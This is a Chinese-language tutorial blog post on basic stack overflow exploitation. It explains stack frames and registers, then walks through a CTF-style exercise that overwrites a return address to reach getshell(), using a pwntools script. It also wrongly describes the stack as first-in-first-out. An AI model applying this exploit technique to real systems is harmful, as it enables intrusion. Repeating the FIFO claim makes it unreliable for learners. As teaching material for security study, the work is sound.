PWN简单利用堆栈溢出漏洞

PWN简单利用堆栈溢出漏洞


0x01 栈的介绍

栈是什么

栈都是一种数据项按序排列的数据结构。

栈的特点

  • 先入先出,先后放入栈中的数据要先取出来。
  • 栈的地址从高处向低处增长,且栈是一块连续区域
  • 栈是由操作系统自动分配和释放,不能被程序员控制。
  • 栈有最大上限,超过范围会报错(段错误)。

栈中如何存储数据

在c/c++中,内存分成5个区,他们分别是堆、栈、自由存储区、全局/静态存储区和常量存储区。

在这里插入图片描述

demo:

#include <stdio.h> 
#include <stdlib.h> 
int a = 0; //全局初始化区 
char *p1; //全局未初始化区 
int main() {     
	int b; //栈     
	char s[] = "abc"; //栈     
	char *p2; //栈     
	char *p3 = "123456"; //123456\0在常量区,p3在栈上。     
	static int c =0; //全局(静态)初始化区    
	p1 = (char *)malloc(10); //堆     
	p2 = (char *)malloc(20);  //堆    
	return 0; 
}

一般情况下,局部变量、函数参数、函数返回地址等会存放在栈上

0x02 函数调用栈

​ 程序的执行过程可看作连续的函数调用。当一个函数执行完毕时,程序要返回调用指令的下一条指令处继续执行。函数调用过程通常使用堆栈实现,每个用户态进程对应一个调用栈结构(call stack)。编译器使用 堆栈传递函数参数、保存返回地址、临时保存寄存器原有值(即函数调用的上下文)以备恢复以及存储本地局部变量。

寄存器分配

​ 寄存器用于存放程序执行中用到的数据和指令。因此函数调用栈的实现与处理器寄存器组密切相关。

寄存器存放着希望短暂保留的数据

  • EIP

    指令寄存器,指向处理器下条等待执行的指令地址(代码段内的偏移量),每次执行完相应汇编指令 EIP值就会增加。

  • ESP

    堆栈指针寄存器,存放执行函数对应栈帧的栈顶地址(也是系统栈的顶部),且始终指向栈顶。

  • EBP

    栈帧基址指针寄存器,存放执行函数对应栈帧的栈底地址,用于C运行库访问栈中的局部变量和参数。

​ 不同架构的CPU,寄存器名称被添加不同前缀以指示寄存器的大小。例如x86架构用字母“e(extended)”作名称前缀,指示寄存器大小为32位;x86_64架构用字母“r”作名称前缀,指示各寄存器大小为64位。

0x03 栈帧结构

​ 函数调用经常是嵌套的,在同一时刻,堆栈中会有多个函数的信息。每个未完成运行的函数占用一个独立的连续区域,称作栈帧(Stack Frame)。栈帧是堆栈的逻辑片段,当调用函数时逻辑栈帧被压入堆栈, 当函数返回时逻辑栈帧被从堆栈中弹出。栈帧存放着函数参数,局部变量及恢复前一栈帧所需要的数据等。

​ 编译器利用栈帧,使得函数参数和函数中局部变量的分配与释放对程序员透明。编译器将控制权移交函数本身之前,插入特定代码将函数参数压入栈帧中,并分配足够的内存空间用于存放函数中的局部变量。栈帧的使用使得递归变为可能,因为对函数的每次递归调用,都会分配给该函数一个新的栈帧,这样就巧妙地隔离当前调用与上次调用。

栈帧的边界由 栈帧基地址指针EBP堆栈指针ESP 界定(指针存放在相应寄存器中)。EBP指向当前栈帧底部(高地址),在当前栈帧内位置固定;ESP指向当前栈帧顶部(低地址),当程序执行时ESP会随着数据的入栈和出栈而移动。函数中对大部分数据的访问都基于EBP进行。

以下称EBP为帧基指针, ESP为栈顶指针,并在引用汇编代码时分别记为 %ebp 和 %esp(32位) 。

函数调用栈的典型内存布局如下图所示:

img
​ 在多线程(任务)环境,栈顶指针指向的存储器区域就是当前使用的堆栈。切换线程的一个重要工作,就是将栈顶指针设为当前线程的堆栈栈顶地址。


例题:堆栈溢出漏洞利用

0x01.运行程序、查看文件类型 和 保护措施

在这里插入图片描述
​ 利用file、checksec命令在这里插入图片描述在这里插入图片描述
可以知道程序需要输入一段字符串,是一个 32位 的程序

0x02.反汇编分析

程序在IDA中打开,打开main(),按F5显示对应伪C代码。

发现程序中有vul()和getshell()函数。
在这里插入图片描述
看见调用vul()函数,进入查看。
在这里插入图片描述

函数中输出一个input:的字符串后,输入一个字符串后,再输出OK,Bye!,发现程序可以通过gets()输入过长字符串造成栈溢出。

main()调用vul()函数时,首先将参数变量压栈,然后将返回地址压栈,接着mov ebp,esp将旧栈顶作为栈底。也就是说我们可以通过栈溢出,覆盖返回地址,从而达到跳转调用getshell()的目的

0x03.调试分析payload

按照上面分析,需要在输入字符串时准确覆盖变量返回地址的值。

  • payload长度

    首先需要确认s写入地址到栈底的距离。由IDA可知vul()的s变量距离栈底的距离是0x6C

    • 或者使用pattern.py脚本和gdb获取溢出地址

      pattern生成200字节长度字符串:python pattern.py create 200

      在gdb中打开程序,输入字符串,提示溢出地址为0x64413764

      利用pattern求得输入多少空数据:python pattern.py offset 64413764

      在这里插入图片描述

      同样得到需要填写的长度的也是112.

    再加上ebp地址0x4后长度是112.

  • payload内容

    前面112个可以是无异意义的内容,后面0x4的地址用于溢出覆盖EIP实现任意跳转跳转。

    • 获取getshell()的地址可以通过IDA查到是080485B1
      在这里插入图片描述

    0x04.payload生成脚本

    from pwn import *
    
    sh = process("./stackoverflow1")
    getshell = 0x080485B1 # 要覆盖上的EIP地址
    sh.recvuntil("input:") # 等待到input出现
    payload = 'a'*112+p32(getshell) # 拼凑的payload
    sh.sendline(payload)
    sh.interactive()
    

0x05.总结

  • 利用gets()函数通过溢出修改函数的返回地址,可以实现跳转任意地址。
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Johnzqh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值